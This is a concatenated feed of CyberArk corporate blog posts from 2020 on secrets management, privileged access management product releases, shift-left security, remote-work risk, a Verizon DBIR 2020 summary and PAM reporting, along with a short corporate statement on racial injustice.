The past few years have been an exciting time for the tech industry. The DevOps revolution has led to increased adoption of Kubernetes. Modern software development toolkits enable developers to easily and consistently build, deploy and scale applications – while keeping a record of all configurations as code.

We’ve also reached the point where – thanks to some prominent data breaches – we recognize that security can’t be an afterthought; it is an important consideration of its own. This realization has led to a greater focus on what secure, cloud-native software development looks like.

Because there was frequent data loss in the early days of DevOps, often due to credential mismanagement, many of the tools that grew out of the advent of DevOps now have their own systems for secrets management. When you use multiple tools to build, deploy, configure and maintain your applications and they each have their own mechanisms for managing security policies and access control, you end up with what we call “security islands:”

A security island is:

A tool or platform that comes with its own built-in security components (that manage secrets, access control, audit, compliance, etc.), but does not facilitate interoperability with other tools and/or aggregation of security policies, management and audit data.

A security island is an isolated subsystem that makes it harder to manage the security of your system as a whole. This can happen when a tool doesn’t have well designed security features like fine-grained access control or detailed transaction audit. It may not securely store data at rest or may not be designed to be interoperable with other tools. Whatever the cause, the result is the same: implementing security for the suite of tools associated with the security island must happen piecemeal and without any centralized oversight.

When your systems are set up so that you’re forced to deal with security islands, you suffer from a lack of consolidated audit and access control and it’s difficult to delegate authority to manage subsystems in any standardized way. You also lack a centralized view of your entire security landscape, which makes it increasingly difficult to manage at scale. Here is an example to illustrate what this might look like in practice:

You use Jenkins CI/CD pipelines that need one set of credentials to deploy applications to staging servers and run tests and another set of credentials to deploy the applications to production. Once the applications are deployed, each individual app or service will need its own credentials to connect to production databases and APIs.

Your Jenkins server can be set up to store the test and production deployment credentials in Jenkins secrets or the credentials plugin. When your apps are deployed to production in AWS, you can use AWS Secrets Manager to store the database secrets and API keys.

This may work initially, but if this becomes just a little more complex, it can quickly prove to be too unwieldy to scale and manage all your security through your DevOps tools. Not only do you now lack an ability to easily delegate, manage and audit, but you’re also struggling to securely scale your team’s applications. If that’s not bad enough, the situation can get even worse.

Consider another team deploying their applications to the same staging and production environments using their own CI/CD. How do you keep the keys consistent across both environments? How do you manage rotation and ensure that only the people and applications that need those credentials are able to access them?

And, as your team’s applications gain increased market traction and you start deploying to multiple clouds for resilience and disaster recovery – you’ve just added yet another security island. Bottom line, as your team’s apps become more successful, the security posture worsens.

In addition, if security is too complicated, teams will choose their own security tools and processes that are outside of official policies. This is a kind of human security island that is often referred to as “Shadow IT.”

Getting to a Better Place

The modern pipelines we’ve created are well designed to improve flow and velocity and to enable us to ship our code, but they are not always built for security. The benefits of these interconnected systems are real and we’re not going to get away from having suites of disparate tools. We can start to improve the experience of managing them when we have technology that enables us to tie them all together.

So, how do you escape from the security islands and weave your tools together in a way that connects them with your established systems of trust?

When you have a way to operate without security islands you get the benefit of centralized audit, access control and administration. It’s easy to delegate authority and to manage at scale. You have the benefit of a centralized view of your overall security landscape and how the individual machines and services interact with each other.

To manage privileged access for applications throughout the software development lifecycle, you need a system that lets you define your entire infrastructure, declare who and what can access which resources, audit all connections that are made and monitor for unusual behavior.

In practice, you want the system that you use for centrally managing application privileged access to enable you to:

  • Automate granting machine identity to applications and processes (like CI servers)
  • Deploy applications so that they are prepared to seamlessly authenticate with the resources they need
  • Centrally manage access control
  • Reduce complications for developers so that Shadow IT is no longer necessary

On the Conjur team at CyberArk, our mission is to create just such a centralized system for managing application privilege in dynamic environments. We built Conjur’s policy engine so that you can put the principle of least privilege into action, and make sure that only the applications and users that should be accessing credentials are able to retrieve them.

We make it easy to onboard new applications and to deploy applications configured to connect to Conjur by providing platform integrations that work with the native properties of platforms to identify apps and avoid the secret zero problem altogether. We make it simple for applications to access the secrets they need or do away with the need for secrets away entirely with Secretless Broker. If you’re interested in learning more, please visit us at conjur.org or join us on the CyberArk Commons!

]]>
Top 5 Features of v11.5: Flexibility for the New Normal https://www.cyberark.com/blog/top-5-features-of-v11-5-flexibility-for-the-new-normal/ Tue, 30 Jun 2020 19:22:06 +0000 https://www.cyberark.com/?p=95002 Privileged Access Management

The world is changing rapidly and privileged access management (PAM) is no exception. Today, we released the latest version of CyberArk Privileged Access Security Solution (v11.5), which contains several new features to help organizations adapt to the new landscape of remote work.

As organizations learn to practice risk distancing, many are now accelerating their digital transformation initiatives by introducing new applications, devices and critical IT assets. Unfortunately, these changes also introduce new risks – many of which organizations are simply not prepared for. Attackers know this, so it shouldn’t be a surprise that cyber attacks are on the rise.  Malicious actors are seeking to profit from the rush to enable business by compromising newly created human and machine identities – especially those that possess privileged access.

The latest version of the CyberArk Privileged Access Security Solution was created to help customers address the challenges of this new normal by reducing risk, simplifying operations and improving business agility.

It’s a jam-packed release, but here is a quick summary of the latest features:

  1. Enhanced Audit Visibility for Linux Systems

In the world of remote work, maintaining visibility into the actions of privileged IT administrators with session isolation and management is as important as ever.

Several new features in version 11.5 improve the audit of managed privileged sessions to Linux systems. PAM teams can now view active SSH sessions, including executed commands, in the monitoring page of the web portal. Additionally, text recording of keystrokes is now available for privileged sessions through programmatic access via automation tools like Ansible as well as privileged sessions to Linux machines for just-in-time access using short-lived SSH certificates.

Organizations need holistic solutions to help ensure accountability, whether through a just-in-time or more traditional approach to privileged access so collectively, these enhanced audit capabilities help our customers simplify audit and compliance requirements for privileged sessions to their Linux systems, whether in the cloud or on-premises.

  1. Simplified Session Management and Secure Access to Third Party Apps

The latest version of the CyberArk Privileged Access Security solution also makes it easier than ever before to add Privileged Session Manager connectors that isolate and monitor privileged sessions to third party applications and devices. This is particularly important as organizations rapidly introduce new tools to facilitate remote work. Version 11.5 offers over 150 trusted and certified session management connectors in the CyberArk Marketplace, which collects integrations with our technology partners in the C3 Technology Alliance.

CyberArk admins can now onboard and manage new connectors directly from a new Platform Management view. This eliminates the need for CyberArk end users to download and manually configure new connectors – reducing human error and saving time. The new Platform Management view also facilitates adoption of session management by ensuring all admin have access to the connectors needed to securely access new infrastructure.

  1. Suspected Credential Theft Detection in Microsoft Azure

CyberArk’s threat analytics capabilities can now automatically detect suspected theft of passwords for Identity and Access Management (IAM) accounts in Microsoft Azure cloud environments and allows CyberArk customers to automatically remediate these events by alerting security teams and rotating the credentials.

With support for suspected credential theft for both Azure and AWS, customers can now extend Privileged Access Management capabilities to more of their cloud estate.

  1. Multi-Cloud and Multi-Region Support for CyberArk Vault Deployments in the Cloud.

CyberArk customers can now deploy CyberArk Vaults across multiple regions and multiple availability zones within one cloud provider and across multiple cloud providers for AWS and Azure.

This enables customers to deploy their primary Vault in AWS and their disaster recovery Vault in Azure or vice-versa. Customers can also deploy their Vaults in two separate AWS or Azure regions or two availability zones within the same region for increased availability. These additional deployment options add flexibility, redundancy and availability for customers that are rapidly moving to cloud and multi-cloud environments.

  1. Simplified Configuration of Ransomware Protection with Endpoint Privilege Manager

Finally, the latest release also includes enhancements to Endpoint Privilege Manager, CyberArk’s solution for securing privileged access on the endpoint.   We’ve updated the user interface to simplify tasks including configuration of Ransomware Protection policies to help defend remote employees against savvy cyber criminals developing new strands of ransomware. Meanwhile, simplified installation for macOS also allows organizations to quickly protect new devices from ransomware attacks.

Necessity is the mother of invention. Organizations everywhere are developing innovative solutions to the problems posed by the new world of work and we’re excited to help them do so securely.

Curious to learn more? Contact us for a demo and learn why over 5,400 customers trust CyberArk to deliver comprehensive privileged access management functionality across their enterprise.

]]>
Shift Left to Successfully Secure Your Apps https://www.cyberark.com/blog/shift-left-to-successfully-secure-your-apps/ Thu, 18 Jun 2020 15:42:13 +0000 https://www.cyberark.com/?p=94568 Shift Left

“Shift left” is a well-known concept for security teams working with software developers. In the simplest sense, it means introducing security at the earliest possible point in the software development lifecycle (SDLC). To understand why this is crucial, especially right now, it’s important to consider a few key points about the software development lifecycle.

It All Starts With the Development Process

Let’s take a quick look at the software development life cycle (SDLC). For a typical development environment, the SDLC reflects how code is developed and eventually put into production. The App lifecycle starts with planning, followed by coding, creating a build, testing and then releasing, deploying and running the new application in production.

Responsibilities across the lifecycle are shared between different teams. Developers primarily write and test the code, while DevOps and Ops are typically responsible for building the systems through which the code flows into production. Security is in the mix too, but too often not brought in until the code is already in production.

Given there are separate development (dev) and production (prod) environments, it might seem like security can just focus on securing the production environments. However, with the increase in the use of automation technology, that is no longer a viable strategy. Many of the development processes are automated by tools such as Jenkins, which runs the CI/CD (Continuous Integration/Continuous Delivery) pipeline, or Ansible, which automates putting code into production.

Now, because of automation, not involving security until deployment is simply too late. Critical security decisions have already been made without security’s guidance and altering these decisions can be time-consuming to re-do. Security needs to “shift left” involving themselves earlier in the development process to ensure that each step of the SLDC can be secured from the start.

Shift Left to Include Security At All Stages of the Development Process   

How does security make the shift left to embed security early in the process? There are a lot of different ways to incorporate security, but one of the most critical steps to take to eliminate vulnerabilities is to remove hardcoded credentials, secrets and access keys from application code. These are the powerful credentials used by applications to access databases, cloud platforms and other sensitive resources.

We’ve all heard the horror stories of a developer embedding credentials in code and using a code repository for version control without realizing that the repository they thought was private was actually public.  Instead of hard coding these privileged credentials in the application, they should instead be secured, managed and monitored by a secrets management platform and only accessed by applications when needed. Code repositories are very widely used, but with secrets management, even when code is inadvertently made public, there are no credentials to be exposed.

One challenge when removing hardcoded credentials is that developers have to code their applications to fetch the passwords and credentials needed to securely access the resource. While it is relatively easy to replace the hardcoded credential with a simple API call early in the development process, it will require considerable rework if you wait until after credentials are hardcoded into the application. A huge potential hassle for developers – but something which be easily solved by having security teams engaged with developers early in the development lifecycle.

Partner and Engage with Developers to Address Security

Developers too often view security as a roadblock, especially if they jump into the process late. Developers also may not fully understand the specific security needs and approaches and may think they can handle it themselves. If you want to get security and DevOps teams to work together smoothly, here are a few practical steps to consider:

  1. Transform your security team into a DevOps partner, by first developing some of the basic skills to understand the development process, so that you can communicate to the development team in their language.
  2. Work with your DevOps counterparts to establish enterprise requirements for securing secrets and credentials.
  3. Help developers understand the security vulnerabilities and the challenges that come with addressing them. Communicate the vulnerabilities in terms that developers can more easily relate to, such as the recent Kubernetes or Docker vulnerabilities. Once they fully understand what it means to be responsible for security — handling compliance and audit requests, securing the human credentials for the DevOps tools, maintaining the secrets management platform and so on – they’ll be eager to hand off those responsibilities.
  4. Make it easy for developers and their code to consume secrets with APIs or out of the box integrations with popular tools, so they can incorporate security into their code without impacting velocity.
  5. Avoid security becoming a bottleneck. Consider offering self-service solutions, such as an automated approval process that enables developers to request security policy updates that allow their apps to access secure resources.

With these steps, many security teams work very successfully together with development teams and build security into their processes. It’s important to recognize that incorporating security early is a journey and even small steps are important.

Want to learn more about how to incorporate security earlier in the development process? Check out our webinar, Securing DevOps 101: “Shift Left” with Security into the Development Workflows, or review The CISO VIEW: Protecting Privileged Access in DevOps and Cloud Environments, which is packed with guidance from CISOs from the Global 2000 organizations.

 

]]>
You’ve Heard of Social Distancing? Now Try Risk Distancing https://www.cyberark.com/blog/youve-heard-of-social-distancing-now-try-risk-distancing/ Tue, 16 Jun 2020 19:38:51 +0000 https://www.cyberark.com/?p=94410

In recent months, social distancing has played a star role in virtually every aspect of our personal and professional lives. Most of us are working from home. In short order, parents were transformed into teachers and full-time caregivers – many times in addition to their full-time jobs. A quick walk down the street requires careful planning: Facemask? Check. Hand sanitizer? Check. Virtual gatherings have replaced social engagements.

It’s hard to imagine when — or if – life will ever settle back into “normal”, but regardless, social distancing is now part of our lexicon. But what about risk distancing? While social distancing is about following recommended best practices to avoid catching or spreading COVID-19, risk distancing is a reminder to follow best practices for security to mitigate risks of an attack.

The risk landscape has also changed dramatically in the wake of the novel coronavirus. Companies rushed to onboard new applications and services to make remote work possible. Risky work-from-home habits are putting critical business systems and sensitive information at risk. For instance, according to a recent survey, 77% of remote employees use unmanaged, insecure “BYOD” devices to access corporate systems. 66% of remote employees have adopted communications and collaboration tools with known security vulnerabilities like Microsoft Teams and Zoom. . Meanwhile, opportunistic cyber criminals have increased their attacks – from targeting RDP servers to launching sophisticated ransomware – in an effort to capitalize on this uncertain time.

Organizations are challenged in how best to quickly and adequately address infrastructure and productivity needs and recognize the necessity of risk distancing. This is especially true when it comes to securing privileged access for remote workers on distributed corporate endpoints.

Practice Risk Distancing In the New Normal

According to CNBC, industries including technology, financial services and insurance have invested in remote work tools and there’s no indication they’ll be returning to the old way of doing business. As more organizations extend work-from-home policies for the long term, security teams should take a hard look at existing cybersecurity programs and priorities to determine if they are still adequate for the changing landscape.

We have curated a collection of resources to help you shape new strategies that effectively balance security and productivity and better prepare your organization for the future of work.  And to be able to drive safe and responsible risk distancing for your own organization.

Check out our Risk Distancing Resource Center to learn why privileged access management (PAM) is one of the most effective ways to protect critical assets, workstations and remote user access. Review best practices, watch informative “Ask The Expert” videos and take advantage of free CyberArk trials and tools that can help identify and mitigate privilege-related vulnerabilities within your environment.

Ready to practice risk distancing? Read some of our latest blog posts to help guide your next steps, including:

 

 

 

 

]]>
Verizon DBIR 2020: Credential Theft, Phishing, Cloud Attacks https://www.cyberark.com/blog/verizon-dbir-2020-credential-theft-phishing-cloud-attacks/ Tue, 09 Jun 2020 20:36:53 +0000 https://www.cyberark.com/?p=93733 Credential Theft and Privileged Access Management

Every year, the security industry at large eagerly awaits the release of the Verizon Data Breach Investigations Report (DBIR). Now in its thirteenth year, the DBIR is widely considered to be one of the industry’s most respected sources of cybersecurity data.

This year’s 119-page report covers a lot of ground, but of course, our team was particularly drawn to insights linked to privileged access and credential abuse. Here’s a look at five themes that stood out:

1. Macro Cybersecurity Trends: Money Is the Number One Motivator

The vast majority of data breaches (86%) were for financial gain, and as such, 72% involved large businesses. Seventy percent of breaches were caused by external actors, with organized crime accounting for more than half (55%). These attackers are homing in on personal data: 58% of breaches involved this – nearly double the number from a year ago.

When it comes to attacks, three methods account for 67% of all breaches: credential theft, social attacks (such as phishing) and errors. What’s most intriguing about this “attack trifecta” is that 17% of all data breaches were caused by seemingly innocuous human mistakes—representing a 50% jump from 2019.

As business adapt to new realities, attackers are shifting away from malware-based attacks to highly targeted ransomware that offers strong lateral movement capability, and ultimately, massive payouts. Report authors note, “Other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence.” According to the report, 27% of malware incidents were ransomware and the threat is growing in part because ransomware-as-a-service is so easy to purchase and use.

But the DBIR isn’t all doom and gloom. There are some encouraging developments. For example, organizations are getting much better and faster at detecting breaches: 81% were discovered in days or less.

2. Privilege Misuse by Authorized Insiders Highest in Healthcare

This year, Verizon analyzed “privilege misuse” through the specific lens of authorized insiders. The DBIR defines privilege misuse as “intentional actions undertaken by internal employees that result in some form of security incident.” While this analysis does not account for privileged access abuse linked to external actors (who are responsible for 70% of all breaches) or third parties across the supply chain, it does illuminate potential dangers within an organization’s own ranks.

Eight percent of all breaches were caused by privilege misuse by employees. Healthcare “remains the industry with the highest number of internal bad actors, due to greater access to credentials.” Manufacturing and finance sectors follow close behind.

3. Phishing and Credential Theft Are Rampant in the Work-from-Home Era

According to the report, phishing remains the top form of social-driven breach and “schemes are increasingly sophisticated and malicious” as remote work surges. Meanwhile, the use of stolen credentials by external actors is on a meteoric rise. More than 80% of breaches tied to hacking (the number one threat action) involve the use of lost or stolen credentials or brute force.

While these findings are not new or surprising, the DBIR reminds us that attackers nearly always take the path of least resistance by using this tried-and-true approach: start with a phishing scam (96% arrive by email) targeting a user’s endpoint, then easily crack weak passwords or steal credentials stored on the device. Using these credentials, the attacker can move from workstation to workstation in search of sensitive data to steal and privileged credentials (such as local admin rights) that enable escalation to higher-value assets and information.

4. Cloud-Based Data Is Under Attack

Credential theft is a pervasive problem everywhere and the cloud is no exception. The DBIR highlights a year-over-year two-fold increase in web application breaches to 43%. Stolen credentials were used in over 80% of these cases.

As cloud adoption accelerates, attackers are turning to cloud-based data as a “quick and easy route to victims.” Cloud assets were involved in nearly a quarter of all breaches of which 77% involved breached credentials.

5. Misconfigurations Put Everything in the Cloud at Risk

Errors won the award for best supporting threat action this year (second only to hacking). Humans have always made mistakes, but the report suggests things are getting worse as “internal end users and system admins make errors as though they were paid to do it.”

Notably, more than 40% of all error-related breaches involved misconfigurations. These happen when a person (usual a system admin or someone with privileged access) spins up a datastore in the cloud without proper security measures in place to protect the data from unauthorized privileged access.

Attackers can abuse misconfigurations to compromise a single privileged user, then move to compromise a cloud management console, or worse, take full control of the organization’s cloud environment. And, as recent headlines show, your misconfigurations will find you out. The report warns, “There are security researchers out there who spend their time looking for just this kind of opportunity. If you build it, they will come.”

The 2019 Verizon DBIR is based on an analysis of 32,002 security incidents and 3,950 confirmed breaches sourced from cases across 81 countries and 16 sectors. Want to dig in deeper? You can find all the details, including industry- and region-specific attack patterns and trends, in the full report. And to learn how to secure privilege to stop attacks, visit here.

]]>
5 Steps to Reporting PAM Outcomes https://www.cyberark.com/blog/securing-success-reporting-pam-wins-back-to-the-business/ Fri, 05 Jun 2020 14:48:18 +0000 https://www.cyberark.com/?p=93634

The director of Identity and Access Management (IAM) is fundamentally responsible for ensuring controls are in place to protect access to sensitive assets within the organization.  This includes all aspects of identity, access and authentication for the entire workforce and also applies to Privileged Access Management (PAM)which is what we’ll be focusing on in this blog.  Specific accountabilities within this role typically include setting strategy, defining a PAM-based risk framework, designing and implementing appropriate access controls and providing monitoring, reporting and mitigation strategies around overall risk.

Executive reporting is essential in providing transparency around the state of risk within the organization and to demonstrate progress with PAM-based programs as they serve to continually reduce that level of risk.  This type of reporting can be delivered in the form of key performance indicators (KPI), which are updates tracked and compared to a specific framework of goals, and Key Risk Indicators (KRI), which serve as a mechanism for monitoring risk reduction.

Scorecards and dashboard tools are often leveraged to help visualize metrics that used to capture the effectiveness of risk mitigation programs. These metrics are key to providing comprehensive reporting back to executives, lines of business and various oversight functions (i.e. risk management, audit and regulators).  However, determining the appropriate level of reporting for each audience is often difficult. One important piece that requires careful consideration is to convey a specific message amongst all the data. And, for that message to hit home, it has to be tailored to the needs of the recipient.

These five fundamental steps can help establish your program, define your risk tolerance and report on your outcomes.

Define a PAM Risk Mitigation Strategy

Defining a comprehensive PAM strategy is a critical step to establishing the key risks you need to mitigate for your organization and how to prioritize your program’s activities.  It is informed by the enterprise cyber security framework, emerging threats, industry trends and oversight requirements.  A sound PAM strategy allows you to develop a risk mitigation plan, a roadmap for privileged access and a target operating model (TOM) that helps ensure the long term sustainability of your controls.

Define a PAM Risk Mitigation Strategy

Designing your PAM model will not only provide you with a long-term view of your risk mitigation strategy, but it will also allow you to consider short-term quick wins, such as delivering PAM controls that provide rapid risk mitigation with the least amount of effort – both technically and politically.

Figure 2. Risk prioritization methodology quadrant, CyberArk Blueprint.

IAM leaders should explore the CyberArk Blueprint, a PAM framework that provides prescriptive guidance and best practice recommendations for PAM development. It’s comprised of three guiding principles that make it easy to articulate the value of the PAM work that’s being executed on and why it’s important. This framework provides actionable risk reduction, which can be turned into a customized plan and roadmap that is then captured and included as part of your metrics reporting.

If you don’t have a PAM strategy and roadmap, your reporting does not provide any meaningful insight into the effectiveness of your risk mitigation activities. Although your reporting will continue to demonstrate some degree of progress, it will not be aligned to an overall series of goals and objectives; therefore, it won’t reflect a true risk posture.

 Establish a Baseline of Privileged Controls

You can’t protect what you don’t know exists. To protect privilege within your enterprise, it is essential to understand the current state of privilege within your enterprise. This includes the inventory of assets within your operating environment and the array of privileged accounts that are used to support them.  Privileged accounts and credentials can be found everywhere – extending across Active Directory, *NIX, IaaS, PaaS, SaaS, SQL and many other IT, OT and business services.  It’s important to scan systems on your network and cloud providers on a regular cadence to uncover privileged accounts, credentials, entitlements and misconfigurations that can pose a risk to your organization.

The data generated from inventory will enable you to assess your level of risk based on your PAM framework and establish a set of targets and priorities for your implementation schedule. It will provide you with a set of numbers (i.e. 15 Window domain accounts, 2500 Windows server local admins, etc.) that will not only define your remediation strategy but will also establish a set of metrics that can be measured and reported against going forward.

One best practice to consider is integrating your PAM solution with vulnerability management and discovery technologies from vendors like Rapid7, Forescout and Tenable. This serves two purposes: providing security for the privileged credentials used to automatically sign-in to sensitive infrastructure environments and, at the same time, providing valuable insights into asset- and credential-based information that can help inform your migration strategy.

The only thing worse than having risk, is not knowing where you have risk or how extensive that risk is!  

Evaluate the Strength of Existing Controls

Defining your PAM strategy and framework establishes your risk goals and tolerance. Meanwhile, your baseline of privileged controls delivers an inventory of both privileged accounts and technology assets. Understanding the state of the existing controls that protect privileged accounts and sensitive information within your assets is critical to defining the next steps of your action plans.  Consider the following:

  • Existing governance and policy language around privileged accounts and asset management
  • Policies and procedures around provisioning, including gating, automation and signoffs
  • A complete review of privileged accounts, roles and responsibilities and entitlements that ensure they are appropriate
  • Security technology controls to protect, detect and monitor access
  • Continuous assessment and testing on a regular basis to validate and remediate the strength of controls

Assessments of these types of controls will provide you with a knowledge of the key areas where you need to focus your program, whether that means quick wins or longer term strategic plans, and will also provide intelligent information to feed either your existing mapping framework or your governance, risk management and compliance (GRC) tools.  This will enable you to visually illustrate where you have controls in place, where they need to be strengthened and how they map to other industry or regulatory compliance requirements

Figure 3. Example policy and controls table.

Understanding the state of your existing controls puts you in the risk driver seat. It allows you to demonstrate your remediation activities against your risk framework and alters the paradigm of having to rely on Audit to discover deficiencies. It transforms into a sound governance model.

Design an Effective Reporting Framework

Developing executive reporting can be challenging as you balance the amount of data you produce with setting the right tone with the right message in you reports. It is essential that your reporting not only depicts progress, but also measures your achievements against your strategy and risk reduction against your framework. Your framework should also consider the audience you are reporting to – whether it is an executive oversight committee, PAM steering committee, Senior Leadership team, audit committees or the board of directors.

Generally, the reporting audience is interested in seeing material progress with the program; on pace to achieve the objectives and driving risk reduction aggressively. It is really a report that qualifies the investment in both resources and finances the organization has made towards the initiative.

The score card below (Figure 4) is an illustration of the program “at a glance,” providing a view of the PAM implementation strategy designed for CISOs and highlighting key areas of both progress and exposure. It measures accomplishments against a series of defined timelines and calls out risk levels based on a pre-established set of measures, typically defined by a CISO.  At a glance, you can tell if projects are progressing and whether or not the current state of onboarding is operating within the risk tolerance levels.

Figure 4. PAM risk and implementation scorecard.

An effective reporting framework should provide measures that align to the progress of your program activities and your strategic framework. Amongst all the data, the complexities of your operating environment and the pervasive risks you are managing, it provides a simplified view into the state of health of your program.

Execute Your Reporting Strategy

Your reporting now becomes your narrative. It informs your leadership and oversight communities of the importance of the program, the progress achieved, issues that need to be managed and the level of risk mitigated as a result of the controls. The messages need to be succinct, concise and informative and will often need to be customized to the audience you are reporting to. Your reporting will be in the form of scorecards, dashboards, presentations and possibly open communications. The most important thing to remember is that your reporting sets the tone of your program. Understanding your audience, what they need to know and where they can help is fundamental to determining how you formalize your communications.

A wide variety of built-in reports – including inventory, entitlement and compliance reports – can be helpful in developing your scorecards and dashboards. Consider maximizing your time by leveraging automated processes to create your dashboards and scorecards.  Exporting easily-ingested data into other business analytics and intelligence tools, such as Splunk Tableu and PowerBI, is another best practice. Consider enriching the data with inputs from other inventory tools, entitlement databases and compliance reports for additional contextual awareness.  Your reporting should also be capable of feeding your GRC tools so that the organization has a real time view of the risk and control landscape.  Use the tools that you have at your disposal and get the most from your existing technology investments.

When it comes to an effective reporting strategy, perception becomes your new reality.  Make sure you understand the audience you are reporting to and that you provide meaningful, transparent and clear communications regarding your program that set the appropriate tone. If you don’t, your reporting committees will draw their own conclusions and they will define the narrative for you.

Secure Your Success as a Director of IAM

As the head of IAM, you are responsible for ensuring the appropriate controls are in place to protect and secure access to your firms most sensitive assets.  Privileged access continues to be a prime target for nefarious characters and poses a significant threat if the controls are not operating effectively. This makes privileged access management a top business priority.

As a trusted advisor, CyberArk partners with IAM directors from around the world to secure and manage privileged access for organizations both large and small.  Securing privileged access is instrumental in mitigating the risk of a cyber attack and maintaining business continuity. A successful PAM program is about more than just technology; it takes great people and well thought out processes to achieve optimal results.

CyberArk has the knowledge, resources and experience to make sure your PAM program is successful at every stage. Before you can report back the success of your PAM program, it’s critical that you get off on the right foot with a guided and prescriptive framework.  Request a Blueprint session today or connect with your existing CyberArk account team to see how we can start securing your success today.

]]>
We All Have a Role to Play – We’re Committed to Ours. https://www.cyberark.com/blog/we-all-have-a-role-to-play-were-committed-to-ours/ Wed, 03 Jun 2020 17:48:52 +0000 https://www.cyberark.com/?p=93473

At CyberArk, we grieve the atrocity of George Floyd’s murder and unequivocally condemn all racial injustice, systematic inequality, and violence against innocent individuals.

I do not have the words to sufficiently express the complexity of the topics we are seeing raised or the history that precedes this boiling point. But America, and the world, has reached a clear turning point, and we all must use our voices to amplify our values.

While CyberArk has a zero-tolerance policy for racism, harassment and discrimination, we can do more to support our employees and communities. As an organization, we are actively working to better educate ourselves on issues of systemic inequality and committed to drive much-needed positive change wherever it is possible. While we cannot change the past, I am confident that together we can help shape a safer, more inclusive future.

]]>
Remote Work Survey: How Cyber Habits at Home Threaten Corporate Network Security https://www.cyberark.com/blog/remote-work-survey-how-cyber-habits-at-home-threaten-corporate-network-security/ Wed, 03 Jun 2020 13:00:20 +0000 https://www.cyberark.com/?p=93244

A new CyberArk survey of 3,000 remote office workers and IT professionals found that work-from-home habits – including password re-use and letting family members use corporate devices – are putting critical business systems and sensitive data at risk.

Here’s an infographic outlining the key findings:

The rush to onboard new applications and services that enable remote work combined with insecure connections and dangerous security practices of employees has significantly widened the attack surface and security strategies need to be updated to match this new dynamic threat landscape. This is especially true when it comes to securing privileged credentials of remote workers, which if compromised could open the door to an organizations most critical systems and resources.

As more organizations extend work-from-home policies for the long term, it’s important to capture lessons learned from the initial phases of remote work and shape future cybersecurity strategies that don’t require employees to make tradeoffs that could put their company at risk.

Secure your success in this new normal; find out more about privileged access management.

]]>
PAM as a Service: It’s All a Matter of Trust https://www.cyberark.com/blog/pam-as-a-service-its-all-a-matter-of-trust/ Tue, 02 Jun 2020 13:59:23 +0000 https://www.cyberark.com/?p=93274 PAM as a Service

With shifting priorities and dynamic technology environments, IT security teams are looking for ways to cover the most ground while draining as few resources as possible. Privileged access management (PAM) continues to be a priority for many organizations as compromised privileged credentials are linked to nearly all attacks. Today, with cyber attackers targeting organizations as they invest in new tools and technologies to support remote work, many security leaders are struggling with how to prioritize new investments and how to get the most out of their existing budgets.

This is where PAM as a Service can help.

Deploying PAM as a Service can help reduce risk by locking down access to a company’s sensitive data, systems and applications – while optimizing resources. It also doesn’t require additional IT resources to manage on-premises infrastructure, perform upgrades, patches and more. Sounds great, right?

Before going down that path, though, it’s important to know what qualities are essential for a PAM as a Service solution you can trust.

SaaS solutions offer opportunities for companies to gain more control over their data, helping them understand how much data they have and where exactly it resides. While it is up to the organization to manage their own policies and users on the ground floor, any company looking to secure sensitive data, systems and applications on the cloud must trust the SaaS vendors that they’re handing the keys to.

Understand the security of the service. Frequently, businesses don’t investigate how exactly security vendors manage and safeguard customer data. They simply assume that everything is completely secure. The American Institute of Certified Public Accountants (AICPA) provides independent assessments – known as SOC 2 – to help organizations understand exactly how companies safeguard customer data and how well those controls are operating. These reports cover the principles of security, availability, confidentiality and privacy.

Most vendors who have cloud offerings hosted via major cloud providers like AWS, Azure or GCP will tout SOC 2 Type 2 compliance but verifying that the service in question has this compliance check further demonstrates a commitment to security for customers. This is an important check to make before trusting a SaaS provider to keep your data secure and private and help ensure that the service will work how and when you need it to.

Know how data is stored and secured. This is a key component of SaaS itself and should be a major consideration. Communications from the cloud to corporate assets need to be encrypted both at rest and in transit. Secure SSH tunnels from the cloud provider to customer-operated systems like Active Directory servers, SIEM servers and others ensures that assets cannot be intercepted by malicious attackers.

Keep privileged account information safe. If privileged account information is going to be transmitted between the cloud and on-premises assets, investigate whether the cloud provider protects that network traffic is undecipherable and encrypted to prevent illicit information exfiltration. The principle of least privilege should be implemented when access is needed to upgrade backend systems and integrate new features. That access is denied on default and only permitted when essential.

Choose a cloud partner you can count on. Finally, the business stability of the vendor itself will show whether you have a partner in security that will be around for the long haul and able to keep up with rapidly changing demands of today’s IT world.  For SaaS, this is particularly relevant as cloud-first organizations change on the fly and need solutions that are secure and as nimble as they are.

To learn more about finding a privileged access management solution you can trust, join us June 19 at 12:00 PM ET for “A Service You Can Trust,” the final installment in the Friday 15 webinar series.

]]>
The Friday 15: All About PAM in 15 Minutes https://www.cyberark.com/blog/the-friday-15-all-about-pam-in-15-minutes/ Thu, 28 May 2020 19:55:51 +0000 https://www.cyberark.com/?p=93167 Privileged Access Management

As a security professional, you’re busier than ever, juggling work, life and everything in between. With convenience being of the utmost importance to us these days, we are excited to launch The Friday 15.  This webinar series will hit on top-of-mind cybersecurity issues – from prioritizing projects that can reduce the greatest amount of risk, to securing privileged access for employees working from home and managing machine and application users across digital initiatives – in 15 minute segments.

Check out the full lineup below and register today.

 What Is Privileged Access Management (PAM) and Why Prioritize PAM as-a-Service?

Watch On Demand

As organizations accelerate digital transformation initiatives, the privilege-related attack surface is expanding at a rapid pace across machines, applications, cloud and hybrid environments, DevOps pipelines, Internet of Things (IoT) devices and more. One of the most proactive security steps an organization can take is to secure privileged access. In this Friday 15, we review different types of accounts, where they exist and how to fast track risk reduction with PAM as-a-Service.

 Get Started with PAM

May 29 at 12:00 p.m. ET and 17:00 GMT | Register Here

You know PAM is essential to proactively reducing risk in your IT environment, but you need some help in turning your security vision into reality. In this Friday 15, we’ll outline a phased, risk-based approach for securing privileged access across on-premises, hybrid and cloud environments. This proven approach can also help future-proof your business as you embrace robotic process automation, DevOps and other digital technologies.

Secure Access for Human Users

June 5 at 12:00 p.m. ET and 17:00 GMT | Register Here

Whether it’s a privileged user misusing their level of access or an attacker stealing privileged credentials from user workstations, having a PAM program in place to protect from these abuses is critical. Whether they’re working from home or the office or providing a third-party service, we’ll demonstrate a secure, balanced way to provide users with elevated privileged access when they need it to perform their jobs – without disrupting workflows.

 Secure Access for Non-Human Users

June 12 at 12:00 p.m. ET and 17:00 GMT | | Register Here

For systems to work together, they have to access one another. That’s why the number of machines and applications that require privileged access vastly exceed the number of people in an organization. In this installment, you’ll learn how to secure these machines and applications by removing hard-coded credentials and replacing them with dynamic, secure credentials and secrets.

 A Service You Can Trust

June 19 at 12:00 p.m. ET and 17:00 GMT | Register Here

